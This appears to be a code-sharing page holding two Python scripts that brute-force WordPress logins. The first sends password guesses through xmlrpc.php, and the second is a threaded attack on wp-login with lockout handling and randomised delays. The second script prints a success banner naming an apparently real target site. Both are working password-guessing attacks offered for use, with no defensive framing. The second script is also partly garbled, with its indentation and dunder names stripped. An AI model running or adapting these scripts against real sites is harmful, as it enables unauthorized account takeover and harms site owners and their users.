Bruteforce Wordpress xmlrpc.php

brutewp.py

import itertools
import requests


TARGET_URL = 'http://yourhosthere/xmlrpc.php'


XML = '''
<?xml version="1.0" encoding="iso-8859-1"?>
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
	<param>
		<value>
			<string>{username}</string>
		</value>
	</param>
	<param>
		<value>
			<string>{password}</string>
		</value>
	</param>
</params>
</methodCall>



'''

def wrap_creds_in_xml(username='', password=''):
	return XML.format(username=username, password=password)
	
def is_correct(text=''):
	constant = 'Benutzer oder Passwort falsch'
	return constant not in text

def get_passwords():
	with open('CHANGEYOURPASSWORDLIST') as file:
		text_as_string = file.read()
		return text_as_string.split('\n')

def main():
	users = ('masteramse', 'admin', 'markus', )
	passwords = get_passwords()
	
	for user, password in itertools.product(users, passwords):
		payload = wrap_creds_in_xml(username=user, password=password)
		response = requests.post(TARGET_URL, payload)
		correct = is_correct(text=response.text)
	
		if not correct:
			print('tried user "{}" pass"{}"'.format(user, password))
		else:
			print('----------FOUND IT!')
			print('USER: {}\nPASS:{}'.format(user, password))
			exit()
if __name__ == '__main__':
	main()
	

import requests
import sys
from datetime import datetime
from concurrent.futures import ThreadPoolExecutor
from time import sleep
from random import uniform

class WordPressChecker:
def init(self, target_url='TargetUrl', threads=5):
self.target_url = target_url
self.threads = threads
self.session = requests.Session()
self.found = False
self.start_time = None
self.attempts = 0

def load_passwords(self, filename='Pass.txt'):
    try:
        with open(filename, 'r', encoding='utf-8', errors='ignore') as f:
            return [line.strip() for line in f if line.strip()]
    except FileNotFoundError:
        print(f"Password file {filename} not found")
        sys.exit(1)

def try_login(self, password):
    if self.found:
        return
        
    try:
        data = {
            'log': '[email protected]',
            'pwd': password,
            'wp-submit': 'Log In'
        }
        
        response = self.session.post(self.target_url, data=data, allow_redirects=False)
        self.attempts += 1
        
        
        status_code = response.status_code
        response_text = response.text.lower()
        location_header = response.headers.get('Location', '')
        
        print(f"[ATTEMPT {self.attempts}] Testing: {password}")
        
        
        if status_code == 302 and 'wp-admin' in location_header:
            self.found = True
            print(f" SUCCESS! Redirect to admin detected!")
            self.print_success(password)
            sys.exit(0)
            
        elif 'dashboard' in response_text or 'wp-admin' in response_text:
            self.found = True
            print(f" SUCCESS! Dashboard content found!")
            self.print_success(password)
            sys.exit(0)
            
        
        elif 'incorrect password' in response_text:
            print(f" WRONG PASSWORD: {password}")
            
        elif 'invalid username' in response_text:
            print(f" INVALID USERNAME (weird - should be correct)")
            
        elif 'error' in response_text:
            print(f"  ERROR DETECTED with: {password}")
            
        elif 'too many failed attempts' in response_text:
            print(f" BLOCKED - Too many attempts with: {password}")
            sleep(10)  
            
        elif status_code == 302:
            print(f" REDIRECT with: {password} -> {location_header}")
            
        else:
            print(f" FAILED: {password} (Status: {status_code})")
        
        
        if self.attempts % 10 == 0:
            self.print_progress()
            
        
        sleep(uniform(0.3, 1.0))
        
    except requests.exceptions.ConnectionError:
        print(f" CONNECTION ERROR with: {password}")
        sleep(3)
        
    except requests.exceptions.Timeout:
        print(f" TIMEOUT with: {password}")
        sleep(2)
        
    except Exception as e:
        print(f" EXCEPTION with {password}: {str(e)}")
        sleep(1)

def print_progress(self):
    elapsed = datetime.now() - self.start_time
    rate = self.attempts / elapsed.total_seconds() if elapsed.total_seconds() > 0 else 0
    print(f"\n PROGRESS: {self.attempts} attempts | Rate: {rate:.2f}/s | Elapsed: {elapsed}\n")

def print_success(self, password):
    print("\n" + "=" * 60)
    print(" CRACKED! WORDPRESS ACCESS GRANTED!")
    print("=" * 60)
    print(f" Username: [email protected]")
    print(f" Password: {password}")
    print(f" Login URL: {self.target_url}")
    print("=" * 60)
    print(" You can now login at: https://luxury-drip.com/wp-admin/")
    print("=" * 60 + "\n")

def run(self):
    self.start_time = datetime.now()
    passwords = self.load_passwords()
    
    print("\n" + "=" * 60)
    print(" WORDPRESS BRUTE FORCE ATTACK STARTED")
    print("=" * 60)
    print(f" Target: {self.target_url}")
    print(f" Username: [email protected]")
    print(f" Passwords loaded: {len(passwords)}")
    print(f" Threads: {self.threads}")
    print(f" Start time: {self.start_time}")
    print("=" * 60 + "\n")
    
    with ThreadPoolExecutor(max_workers=self.threads) as executor:
        executor.map(self.try_login, passwords)
    
    if not self.found:
        print("\n" + "=" * 50)
        print(" BRUTE FORCE COMPLETED - NO PASSWORD FOUND")
        print("=" * 50)
        print(f"Total attempts: {self.attempts}")
        print("Try a different password list or check if site is blocking")
        print("=" * 50)

def main():
try:
checker = WordPressChecker(threads=5)
checker.run()
except KeyboardInterrupt:
print("\n\n OPERATION CANCELLED BY USER")
print(f"Total attempts made: {checker.attempts}")
except Exception as e:
print(f" CRITICAL ERROR: {str(e)}")
sys.exit(1)

if name == 'main':
main()